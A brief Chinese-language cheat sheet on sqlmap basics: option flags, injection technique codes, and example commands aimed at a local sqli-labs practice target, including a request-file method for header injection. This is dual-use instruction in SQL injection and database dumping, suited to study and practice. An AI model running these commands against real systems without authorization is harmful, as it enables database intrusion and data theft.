sqlmap基础
一览:
查看帮助:sqlmap -h
指定url: -u /--url
--batch 使用默认配置
-m 指定文件
-D 指定数据库
-T 指定表
-C 指定字段
-dbs 探测数据库
--tables 探测数据库表名
--columns 探测字段名
--user 探测数据库用户名
-r 指定http请求文件
--level2 指定探测级别
--technique=B 检测sql注入的类型
B:布尔盲注
E:报错注入
U:联合查询注入
S:注册表相关注入
T:时间盲注
--dump #转储获取到的数据库信息。
--proxy 指定代理
--proxy-file 指定代理文件
举例:
列一(对单个):
命令:
sqlmap -u 'http://192.168.10.183/sqli-labs/Less-1/?id=1' --dbs --batch
列二(从文件中读取):
命令:
sqlmap -m csdnsql.txt --dbs --batch
列三(http头注入):
注:将http头放在一个txt文件里,想测试那个地方就在那个地方放‘*’
列:
命令:
sqlmap -r http_1.txt --dbs --batch
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
二维码